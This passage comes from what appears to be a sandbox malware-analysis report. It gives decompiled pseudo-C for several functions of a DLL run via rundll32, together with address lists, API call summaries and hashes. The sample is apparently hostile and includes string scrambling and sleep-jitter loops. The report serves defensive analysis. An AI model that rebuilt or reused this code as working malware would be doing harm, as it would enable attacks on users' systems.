										_t44 = E04445458(_t61, _t67, _v8); // executed
										_t54 = _t44;
										goto L30;
									}
									__eflags = _t67;
									if(__eflags == 0) {
										goto L30;
									}
									_t54 = E04447576(__eflags,  &(_t67[4]));
									__eflags = _t54;
									if(_t54 == 0) {
										goto L30;
									}
									goto L29;
								}
								_t54 = 8;
							}
						}
					} else {
						_t68 = _v12;
						if(_t68 == 0) {
							L30:
							if(_v16 == 0 || _v16 == 1) {
								 *0x444a17c();
							}
							goto L34;
						}
						_t69 =  &(_t68[4]);
						do {
						} while (E044478DB(_t63, _t69, 0, 1) == 0x4c7);
					}
					goto L30;
				} else {
					_t54 = _t22;
					L34:
					return _t54;
				}
			}































                    0x04446535
                    0x0444653f
                    0x04446542
                    0x04446545
                    0x04446548
                    0x0444654f
                    0x04446551
                    0x0444655d
                    0x0444655f
                    0x0444655f
                    0x04446568
                    0x04446570
                    0x04446573
                    0x0444658d
                    0x04446599
                    0x0444659b
                    0x044465a0
                    0x044465aa
                    0x044465aa
                    0x044465a2
                    0x044465a2
                    0x044465a2
                    0x044465a2
                    0x044465b1
                    0x044465be
                    0x044465c5
                    0x044465ca
                    0x044465ca
                    0x044465d3
                    0x044465d6
                    0x044465fc
                    0x04446608
                    0x0444660d
                    0x0444660f
                    0x04446614
                    0x04446640
                    0x04446642
                    0x04446616
                    0x0444661a
                    0x0444661f
                    0x04446624
                    0x0444662b
                    0x04446631
                    0x04446636
                    0x0444663c
                    0x04446643
                    0x04446645
                    0x04446647
                    0x04446656
                    0x0444665c
                    0x0444665e
                    0x04446663
                    0x04446693
                    0x04446695
                    0x04446665
                    0x04446665
                    0x0444666b
                    0x04446678
                    0x0444667e
                    0x0444667e
                    0x04446686
                    0x0444668f
                    0x04446696
                    0x04446698
                    0x0444669a
                    0x044466a1
                    0x044466ae
                    0x044466b3
                    0x044466b8
                    0x044466ba
                    0x044466bc
                    0x00000000
                    0x00000000
                    0x044466be
                    0x044466c3
                    0x044466c5
                    0x044466cc
                    0x044466d0
                    0x044466d3
                    0x044466e8
                    0x044466ec
                    0x044466f1
                    0x00000000
                    0x044466f1
                    0x044466d5
                    0x044466d7
                    0x00000000
                    0x00000000
                    0x044466e2
                    0x044466e4
                    0x044466e6
                    0x00000000
                    0x00000000
                    0x00000000
                    0x044466e6
                    0x044466c9
                    0x044466c9
                    0x0444669a
                    0x044465d8
                    0x044465d8
                    0x044465dd
                    0x044466f3
                    0x044466f8
                    0x04446700
                    0x04446700
                    0x00000000
                    0x044466f8
                    0x044465e3
                    0x044465e6
                    0x044465f0
                    0x044465f7
                    0x00000000
                    0x04446708
                    0x04446708
                    0x0444670b
                    0x0444670f
                    0x0444670f

                    APIs
                      • Part of subcall function 04444843: GetModuleHandleA.KERNEL32(4C44544E,00000000,0444654D,00000001), ref: 04444852
                    • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 044465CA
                      • Part of subcall function 044463FD: RtlAllocateHeap.NTDLL(00000000,00000000,044428D5), ref: 04446409
                    • memset.NTDLL ref: 0444661A
                    • RtlInitializeCriticalSection.NTDLL(04F49570), ref: 0444662B
                      • Part of subcall function 04447576: memset.NTDLL ref: 04447590
                      • Part of subcall function 04447576: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 044475D6
                      • Part of subcall function 04447576: StrCmpNIW.SHLWAPI(00000000,?,00000000), ref: 044475E1
                    • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 04446656
                    • wsprintfA.USER32 ref: 04446686
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                    • String ID:
                    • API String ID: 4246211962-0
                    • Opcode ID: 245d074093a1218ade2224a7ab5b94aa586265e5c8a8db1db65eeb9ac36e9c87
                    • Instruction ID: fc1387889d4b4bad0e9dcaaea5a57f8bacf839158e2d49f7a7b7862d317d7bc4
                    • Opcode Fuzzy Hash: 245d074093a1218ade2224a7ab5b94aa586265e5c8a8db1db65eeb9ac36e9c87
                    • Instruction Fuzzy Hash: 5551D071B40225ABFF209FA5E844B6F77A8EBC6704F01442BE501E7241EABCB9449B90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 044437CE Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 145stringCOMMON
                    Download Yara Rule
                    C-Code - Quality: 22%
                    			E044437CE(signed int __eax, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _t81;
				char _t83;
				signed int _t90;
				signed int _t97;
				signed int _t99;
				char _t101;
				unsigned int _t102;
				intOrPtr _t103;
				char* _t107;
				signed int _t110;
				signed int _t113;
				signed int _t118;
				signed int _t122;
				intOrPtr _t124;

				_t102 = _a8;
				_t118 = 0;
				_v20 = __eax;
				_t122 = (_t102 >> 2) + 1;
				_v8 = 0;
				_a8 = 0;
				_t81 = E044463FD(_t122 << 2);
				_v16 = _t81;
				if(_t81 == 0) {
					_push(8);
					_pop(0);
					L37:
					return 0;
				}
				_t107 = _a4;
				_a4 = _t102;
				_t113 = 0;
				while(1) {
					_t83 =  *_t107;
					if(_t83 == 0) {
						break;
					}
					if(_t83 == 0xd || _t83 == 0xa) {
						if(_t118 != 0) {
							if(_t118 > _v8) {
								_v8 = _t118;
							}
							_a8 = _a8 + 1;
							_t118 = 0;
						}
						 *_t107 = 0;
						goto L16;
					} else {
						if(_t118 != 0) {
							L10:
							_t118 = _t118 + 1;
							L16:
							_t107 = _t107 + 1;
							_t15 =  &_a4;
							 *_t15 = _a4 - 1;
							if( *_t15 != 0) {
								continue;
							}
							break;
						}
						if(_t113 == _t122) {
							L21:
							if(_a8 <= 0x20) {
								_push(0xb);
								L34:
								_pop(0);
								L35:
								E044417AB(_v16);
								goto L37;
							}
							_t24 = _v8 + 5; // 0xcdd8d2f8
							_t103 = E044463FD((_v8 + _t24) * _a8 + 4);
							if(_t103 == 0) {
								_push(8);
								goto L34;
							}
							_t90 = _a8;
							_a4 = _a4 & 0x00000000;
							_v8 = _v8 & 0x00000000;
							_t124 = _t103 + _t90 * 4;
							if(_t90 <= 0) {
								L31:
								 *0x444a318 = _t103;
								goto L35;
							}
							do {
								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
								_v12 = _v12 & 0x00000000;
								if(_a4 <= 0) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t99 = _v12;
									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124); // executed
									if(_t99 == 0) {
										break;
									}
									_v12 = _v12 + 1;
									if(_v12 < _a4) {
										continue;
									}
									goto L30;
								}
								_v8 = _v8 - 1;
								L30:
								_t97 = _a4;
								_a4 = _a4 + 1;
								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
								__imp__(_t124);
								_v8 = _v8 + 1;
								_t124 = _t124 + _t97 + 1;
							} while (_v8 < _a8);
							goto L31;
						}
						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
						_t101 = _t83;
						if(_t83 - 0x61 <= 0x19) {
							_t101 = _t101 - 0x20;
						}
						 *_t107 = _t101;
						_t113 = _t113 + 1;
						goto L10;
					}
				}
				if(_t118 != 0) {
					if(_t118 > _v8) {
						_v8 = _t118;
					}
					_a8 = _a8 + 1;
				}
				goto L21;
			}





















                    0x044437d5
                    0x044437dc
                    0x044437e1
                    0x044437e4
                    0x044437eb
                    0x044437ee
                    0x044437f1
                    0x044437f8
                    0x044437fb
                    0x0444394f
                    0x04443951
                    0x04443953
                    0x04443958
                    0x04443958
                    0x04443801
                    0x04443804
                    0x04443807
                    0x04443809
                    0x04443809
                    0x0444380d
                    0x00000000
                    0x00000000
                    0x04443811
                    0x0444383d
                    0x04443842
                    0x04443844
                    0x04443844
                    0x04443847
                    0x0444384a
                    0x0444384a
                    0x0444384c
                    0x00000000
                    0x04443817
                    0x04443819
                    0x04443838
                    0x04443838
                    0x0444384f
                    0x0444384f
                    0x04443850
                    0x04443850
                    0x04443853
                    0x00000000
                    0x00000000
                    0x00000000
                    0x04443853
                    0x0444381d
                    0x04443864
                    0x04443868
                    0x04443942
                    0x04443944
                    0x04443944
                    0x04443945
                    0x04443948
                    0x00000000
                    0x04443948
                    0x04443871
                    0x04443882
                    0x04443886
                    0x0444393e
                    0x00000000
                    0x0444393e
                    0x0444388c
                    0x0444388f
                    0x04443893
                    0x04443899
                    0x0444389c
                    0x04443934
                    0x04443934
                    0x00000000
                    0x0444393a
                    0x044438a7
                    0x044438b0
                    0x044438c4
                    0x044438cb
                    0x044438e0
                    0x044438e6
                    0x044438ee
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x044438f0
                    0x044438f0
                    0x044438f0
                    0x044438f7
                    0x044438ff
                    0x00000000
                    0x00000000
                    0x04443901
                    0x0444390a
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0444390c
                    0x0444390e
                    0x04443911
                    0x04443911
                    0x04443914
                    0x04443918
                    0x0444391b
                    0x04443921
                    0x04443924
                    0x0444392b
                    0x00000000
                    0x044438a7
                    0x04443822
                    0x0444382d
                    0x04443830
                    0x04443832
                    0x04443832
                    0x04443835
                    0x04443837
                    0x00000000
                    0x04443837
                    0x04443811
                    0x04443857
                    0x0444385c
                    0x0444385e
                    0x0444385e
                    0x04443861
                    0x04443861
                    0x00000000

                    APIs
                      • Part of subcall function 044463FD: RtlAllocateHeap.NTDLL(00000000,00000000,044428D5), ref: 04446409
                    • lstrcpy.KERNEL32(69B25F45,00000020), ref: 044438CB
                    • lstrcat.KERNEL32(69B25F45,00000020), ref: 044438E0
                    • lstrcmp.KERNEL32(00000000,69B25F45), ref: 044438F7
                    • lstrlen.KERNEL32(69B25F45), ref: 0444391B
                    Strings
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                    • String ID:
                    • API String ID: 3214092121-3916222277
                    • Opcode ID: 1cf2bc5645240097ead0f30abf7fb17a4ee227142a954a50c5c58aac9eb21d9a
                    • Instruction ID: bb2f0bfc7b7ebb305cb2b7c7b5396e208f5d4e4817e95226dcfe80aea78dbfd6
                    • Opcode Fuzzy Hash: 1cf2bc5645240097ead0f30abf7fb17a4ee227142a954a50c5c58aac9eb21d9a
                    • Instruction Fuzzy Hash: 4A517A71B00608EBEF25CF99C4856AEFBB6FF95B24F15805BEC55AB201D730AA51CB40
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04443399 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 94memoryCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E04443399(void* __edx) {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* __edi;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t32;
				intOrPtr _t35;
				void* _t37;
				intOrPtr _t38;
				intOrPtr _t42;
				void* _t45;
				void* _t50;
				void* _t52;

				_t50 = __edx;
				_v12 = 0;
				_t23 = E044440C7(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0x444a320; // 0xafd5a8
				_t4 = _t24 + 0x444be30; // 0x4f493d8
				_t5 = _t24 + 0x444bdd8; // 0x4f0053
				_t26 = E04442985( &_v16, _v8, _t5, _t4); // executed
				_t45 = _t26;
				if(_t45 == 0) {
					StrToIntExW(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0x444a320; // 0xafd5a8
						_t11 = _t32 + 0x444be24; // 0x4f493cc
						_t48 = _t11;
						_t12 = _t32 + 0x444bdd8; // 0x4f0053
						_t52 = E0444114D(_t11, _t12, _t11);
						_t59 = _t52;
						if(_t52 != 0) {
							_t35 =  *0x444a320; // 0xafd5a8
							_t13 = _t35 + 0x444be6e; // 0x30314549
							_t37 = E04445231(_t48, _t50, _t59, _v8, _t52, _t13, 0x14); // executed
							if(_t37 == 0) {
								_t61 =  *0x444a2fc - 6;
								if( *0x444a2fc <= 6) {
									_t42 =  *0x444a320; // 0xafd5a8
									_t15 = _t42 + 0x444bdba; // 0x52384549
									E04445231(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
								}
							}
							_t38 =  *0x444a320; // 0xafd5a8
							_t17 = _t38 + 0x444be68; // 0x4f49410
							_t18 = _t38 + 0x444be40; // 0x680043
							_t45 = E044434EE(_v8, 0x80000001, _t52, _t18, _t17);
							HeapFree( *0x444a2d8, 0, _t52);
						}
					}
					HeapFree( *0x444a2d8, 0, _v16);
				}
				_t54 = _v8;
				if(_v8 != 0) {
					E04444B59(_t54);
				}
				return _t45;
			}



















                    0x04443399
                    0x044433a9
                    0x044433ac
                    0x044433b3
                    0x044433b5
                    0x044433b5
                    0x044433b8
                    0x044433bd
                    0x044433c4
                    0x044433d1
                    0x044433d6
                    0x044433da
                    0x044433e8
                    0x044433f6
                    0x044433fa
                    0x0444348b
                    0x0444348b
                    0x04443400
                    0x04443400
                    0x04443405
                    0x04443405
                    0x0444340c
                    0x04443418
                    0x0444341a
                    0x0444341c
                    0x0444341e
                    0x04443425
                    0x04443430
                    0x04443437
                    0x04443439
                    0x04443440
                    0x04443442
                    0x04443449
                    0x04443454
                    0x04443454
                    0x04443440
                    0x04443459
                    0x0444345e
                    0x04443465
                    0x04443483
                    0x04443485
                    0x04443485
                    0x0444341c
                    0x04443497
                    0x04443497
                    0x04443499
                    0x0444349e
                    0x044434a0
                    0x044434a0
                    0x044434ab

                    APIs
                    • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,04F493D8,00000000,?,74E5F710,00000000,74E5F730), ref: 044433E8
                    • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,04F49410,?,00000000,30314549,00000014,004F0053,04F493CC), ref: 04443485
                    • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,044454F9), ref: 04443497
                    Strings
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: FreeHeap
                    • String ID: Ut
                    • API String ID: 3298025750-8415677
                    • Opcode ID: 3d6d0b77b389be16fae7f45187fb8032b2d9a415f64b9c2e15fca22ea83c8c56
                    • Instruction ID: e4691deca3fe0ab750c794b35bc1707de10dbe8ca3e36a657dc7e80d38f3839d
                    • Opcode Fuzzy Hash: 3d6d0b77b389be16fae7f45187fb8032b2d9a415f64b9c2e15fca22ea83c8c56
                    • Instruction Fuzzy Hash: E9316F76A00148BFFF129FE1DC45E9EB7BCEBC9704F1400AABA00AB151D671BE189B50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 044414E4 Relevance: 6.1, APIs: 4, Instructions: 98memoryCOMMON
                    Download Yara Rule
                    APIs
                    • SysAllocString.OLEAUT32(80000002), ref: 0444153B
                    • SysAllocString.OLEAUT32(04442BCC), ref: 0444157E
                    • SysFreeString.OLEAUT32(00000000), ref: 04441592
                    • SysFreeString.OLEAUT32(00000000), ref: 044415A0
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: String$AllocFree
                    • String ID:
                    • API String ID: 344208780-0
                    • Opcode ID: bace32b088ce8cae95d0536e8da7b82004bd3ca6d4f233036a2e5154d451cd73
                    • Instruction ID: 9da91bbf1b794659d26c7c5e49874800284525124e799227f5bca2da04c0d96d
                    • Opcode Fuzzy Hash: bace32b088ce8cae95d0536e8da7b82004bd3ca6d4f233036a2e5154d451cd73
                    • Instruction Fuzzy Hash: 1131EAB6900209EFDB05DF99D4848EE7BB5FF88340B14842EF50AA7210E735AA85CF61
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 044457A8 Relevance: 6.1, APIs: 4, Instructions: 76sleepstringCOMMON
                    Download Yara Rule
                    C-Code - Quality: 78%
                    			E044457A8(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0; // executed
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E044463FD(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}














                    0x044457b4
                    0x044457b8
                    0x044457b9
                    0x044457ba
                    0x044457bc
                    0x044457be
                    0x044457c3
                    0x044457c6
                    0x0444585d
                    0x04445864
                    0x04445864
                    0x044457cf
                    0x044457d6
                    0x044457e6
                    0x044457e6
                    0x044457ec
                    0x044457ee
                    0x044457f3
                    0x044457fc
                    0x04445804
                    0x04445807
                    0x04445812
                    0x04445816
                    0x04445818
                    0x04445819
                    0x04445822
                    0x04445826
                    0x04445837
                    0x04445828
                    0x0444582d
                    0x04445832
                    0x04445841
                    0x04445841
                    0x04445816
                    0x04445847
                    0x0444584d
                    0x0444584d
                    0x04445856
                    0x0444585b
                    0x0444585b
                    0x00000000

                    APIs
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: FreeSleepStringlstrlenmemcpy
                    • String ID:
                    • API String ID: 1198164300-0
                    • Opcode ID: 4a60ab949339256b1a72650e3ab13f27cbd5c8f6bd70305c7f70ddcb25c0fed6
                    • Instruction ID: eb089adb904146b09022a541a8d5eaabc76f01114cbeb4ba692d4eaf35ddaacb
                    • Opcode Fuzzy Hash: 4a60ab949339256b1a72650e3ab13f27cbd5c8f6bd70305c7f70ddcb25c0fed6
                    • Instruction Fuzzy Hash: 1D215E75A00609FFEF11DFA4C88499EBBB8FF89310B1045AEE915D7200EB30AA11CF50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04442A4C Relevance: 6.0, APIs: 4, Instructions: 44sleepthreadtimeCOMMON
                    Download Yara Rule
                    C-Code - Quality: 65%
                    			E04442A4C(void* __ecx, intOrPtr _a4) {
				struct _FILETIME _v12;
				int _t13;
				signed int _t16;
				void* _t18;
				signed int _t19;
				unsigned int _t23;
				void* _t30;
				signed int _t34;

				_v12.dwLowDateTime = _v12.dwLowDateTime & 0x00000000;
				asm("stosd");
				do {
					_t13 = SwitchToThread();
					GetSystemTimeAsFileTime( &_v12);
					_t23 = _v12.dwHighDateTime;
					_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 5;
					_push(0);
					_push(0x13);
					_push(_t23 >> 5);
					_push(_t16);
					L044482E6();
					_t34 = _t16 + _t13;
					_t18 = E04442888(_a4, _t34);
					_t30 = _t18;
					_t19 = 3;
					Sleep(_t19 << (_t34 & 0x00000007)); // executed
				} while (_t30 == 1);
				return _t30;
			}











                    0x04442a51
                    0x04442a5c
                    0x04442a5d
                    0x04442a5d
                    0x04442a69
                    0x04442a72
                    0x04442a75
                    0x04442a79
                    0x04442a7b
                    0x04442a80
                    0x04442a81
                    0x04442a82
                    0x04442a8c
                    0x04442a8f
                    0x04442a96
                    0x04442a9a
                    0x04442aa1
                    0x04442aa7
                    0x04442ab1

                    APIs
                    • SwitchToThread.KERNEL32(?,00000001,?,?,?,04444610,?,?), ref: 04442A5D
                    • GetSystemTimeAsFileTime.KERNEL32(00000000,?,00000001,?,?,?,04444610,?,?), ref: 04442A69
                    • _aullrem.NTDLL(00000000,?,00000013,00000000), ref: 04442A82
                      • Part of subcall function 04442888: memcpy.NTDLL(00000000,00000000,?,?,00000000,?,?,?,00000000), ref: 044428E7
                    • Sleep.KERNEL32(00000003,00000000,?,00000001,?,?,?,04444610,?,?), ref: 04442AA1
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: Time$FileSleepSwitchSystemThread_aullremmemcpy
                    • String ID:
                    • API String ID: 1610602887-0
                    • Opcode ID: 17c2a6d608c4322669791a8f2fbfd13324669c93c96cad92fd0cefd5c2919c72
                    • Instruction ID: 798cf5418393bc0f7a73e4fb5b374da2f1ba4c604ee098caaefb341fcc6cfd17
                    • Opcode Fuzzy Hash: 17c2a6d608c4322669791a8f2fbfd13324669c93c96cad92fd0cefd5c2919c72
                    • Instruction Fuzzy Hash: 2EF0A4B7A40508BBEB149BA5CC19B9FB6A8EBC4355F100165F601E7240E5B8AE00C664
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04445231 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47memorytimeCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E04445231(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				struct _FILETIME _v12;
				void* _t11;
				void* _t15;
				void* _t20;
				void* _t22;
				void* _t23;
				signed short* _t24;

				_t22 = __edx;
				_t23 = E04445406(_t11, _a12);
				if(_t23 == 0) {
					_t20 = 8;
				} else {
					_t24 = _t23 + _a16 * 2;
					 *_t24 =  *_t24 & 0x00000000; // executed
					_t15 = E044415E6(__ecx, _a4, _a8, _t23); // executed
					_t20 = _t15;
					if(_t20 == 0) {
						GetSystemTimeAsFileTime( &_v12);
						 *_t24 = 0x5f;
						_t20 = E04445B98(_t22, _a4, 0x80000001, _a8, _t23,  &_v12, 8);
					}
					HeapFree( *0x444a2d8, 0, _t23);
				}
				return _t20;
			}










                    0x04445231
                    0x04445242
                    0x04445246
                    0x0444529f
                    0x04445248
                    0x0444524f
                    0x04445255
                    0x04445259
                    0x0444525e
                    0x04445262
                    0x04445268
                    0x04445278
                    0x0444528a
                    0x0444528a
                    0x04445295
                    0x04445295
                    0x044452a6

                    APIs
                      • Part of subcall function 04445406: lstrlen.KERNEL32(?,00000000,04F49D58,00000000,04443C77,04F49F7B,69B25F44,?,?,?,?,69B25F44,00000005,0444A00C,4D283A53,?), ref: 0444540D
                      • Part of subcall function 04445406: mbstowcs.NTDLL ref: 04445436
                      • Part of subcall function 04445406: memset.NTDLL ref: 04445448
                    • GetSystemTimeAsFileTime.KERNEL32(004F0053,004F0053,00000014,00000000,00000008,00000000,74E05520,00000008,00000014,004F0053,04F493CC), ref: 04445268
                    • HeapFree.KERNEL32(00000000,00000000,004F0053,00000014,00000000,00000008,00000000,74E05520,00000008,00000014,004F0053,04F493CC), ref: 04445295
                    Strings
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: Time$FileFreeHeapSystemlstrlenmbstowcsmemset
                    • String ID: Ut
                    • API String ID: 1500278894-8415677
                    • Opcode ID: 116e07ad0dfadd62f25cdfa4633391ad4d7a1425addf8d5d7d1cb2b2e270216a
                    • Instruction ID: 878fd62d158f71a373c5592058e74c339a26990df44a47be661e821e090c4675
                    • Opcode Fuzzy Hash: 116e07ad0dfadd62f25cdfa4633391ad4d7a1425addf8d5d7d1cb2b2e270216a
                    • Instruction Fuzzy Hash: 2D01A232200209BBFF215F95DC44F9BBB78FBC4704F00402AFA00AA151E771E855DB50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04443B61 Relevance: 4.6, APIs: 3, Instructions: 58COMMON
                    Download Yara Rule
                    C-Code - Quality: 47%
                    			E04443B61(char* _a4, char** _a8) {
				char* _t7;
				char* _t11;
				char* _t14;
				char* _t16;
				char* _t17;
				char _t18;
				signed int _t20;
				signed int _t22;

				_t16 = _a4;
				_push(0x20);
				_t20 = 1;
				_push(_t16);
				while(1) {
					_t7 = StrChrA();
					if(_t7 == 0) {
						break;
					}
					_t20 = _t20 + 1;
					_push(0x20);
					_push( &(_t7[1]));
				}
				_t11 = E044463FD(_t20 << 2);
				_a4 = _t11;
				if(_t11 != 0) {
					StrTrimA(_t16, 0x4449284); // executed
					_t22 = 0;
					do {
						_t14 = StrChrA(_t16, 0x20);
						if(_t14 != 0) {
							 *_t14 = 0;
							do {
								_t14 =  &(_t14[1]);
								_t18 =  *_t14;
							} while (_t18 == 0x20 || _t18 == 9);
						}
						_t17 = _a4;
						 *(_t17 + _t22 * 4) = _t16;
						_t22 = _t22 + 1;
						_t16 = _t14;
					} while (_t14 != 0);
					 *_a8 = _t17;
				}
				return 0;
			}











                    0x04443b65
                    0x04443b72
                    0x04443b74
                    0x04443b75
                    0x04443b7d
                    0x04443b7d
                    0x04443b81
                    0x00000000
                    0x00000000
                    0x04443b78
                    0x04443b79
                    0x04443b7c
                    0x04443b7c
                    0x04443b89
                    0x04443b90
                    0x04443b93
                    0x04443b9b
                    0x04443ba1
                    0x04443ba3
                    0x04443ba6
                    0x04443baa
                    0x04443bac
                    0x04443baf
                    0x04443baf
                    0x04443bb0
                    0x04443bb2
                    0x04443baf
                    0x04443bbc
                    0x04443bbf
                    0x04443bc2
                    0x04443bc5
                    0x04443bc5
                    0x04443bcc
                    0x04443bcc
                    0x04443bd8

                    APIs
                    • StrChrA.SHLWAPI(?,00000020,00000000,04F495AC,?,?,0444104B,?,04F495AC), ref: 04443B7D
